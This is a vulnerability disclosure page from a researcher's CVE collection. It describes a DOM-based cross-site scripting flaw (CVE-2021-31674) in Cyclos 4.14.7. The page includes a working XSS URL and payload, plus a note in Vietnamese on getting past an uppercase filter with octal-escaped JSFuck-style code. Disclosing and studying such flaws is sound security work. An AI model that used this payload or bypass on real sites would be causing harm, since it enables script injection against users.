MyCVE
  • Cylos
    • Cyclos 4.14.7 - Dom-based Cross-Site Scripting in undefined enum (CVE-2021-31674)
    • Cyclos 4.14.7 - Dom-based Cross-Site Scripting (CVE-2021-31673)
  • nopCommerce
    • Open Redirect on nopCommerce 4.50.1
    • Security issues in nopCommerce 4.50.1
  • SmartVista
    • SmartVista Cardgen
      • Reflected XSS in SmartVista Cardgen version 3.28.0 (CVE-2022-35554)
      • Path traversal in SmartVista Cardgen version 3.28.0 (CVE-2022-38613)
      • List all files in arbitrary folder in SmartVista Cardgen version 3.28.0 (CVE-2022-38614)
    • SmartVista SVFE2
      • SQL Injection in Service Group feature of SmartVista SVFE2 version 2.2.22 (CVE-2022-38615)
      • SQL Injection in Terminal Tariff Group feature of SmartVista SVFE2 version 2.2.22 (CVE-2022-38616)
  • CraftCMS
    • Server-Site Template Injection on CraftCMS 3.8.1
Powered by GitBook
On this page
  • CVE-2021-31674
  • Note
  1. Cylos

Cyclos 4.14.7 - Dom-based Cross-Site Scripting in undefined enum (CVE-2021-31674)

PreviousCylosNextCyclos 4.14.7 - Dom-based Cross-Site Scripting (CVE-2021-31673)

Last updated 3 years ago

CVE-2021-31674

Date: 18/04/2021

Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services

Vendor Homepage: https://www.cyclos.org/

Affected Version(s): Cyclos 4.14.7 (and prior)

Description: Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.

Steps to reproduce: An attacker sends a draft URL [IP]/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim. When a victim opens the URL, XSS will be triggered.

Note

Khi nhập vào một enum không tồn tại, thông báo lỗi sẽ xuất hiện kèm theo giá trị nhập vào, tuy nhiên các giá trị này sẽ đi qua function uppercase()

Như chúng ta đã biết nếu cụm alert() bị viết hoa (ALERT()) thì sẽ không có popup xảy ra

Do đó ta có thể sử dụng function alert() dạng JSFUCK rồi encode dạng octet để payload được ngắn lại. Final payload: <img src=x onerror="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)">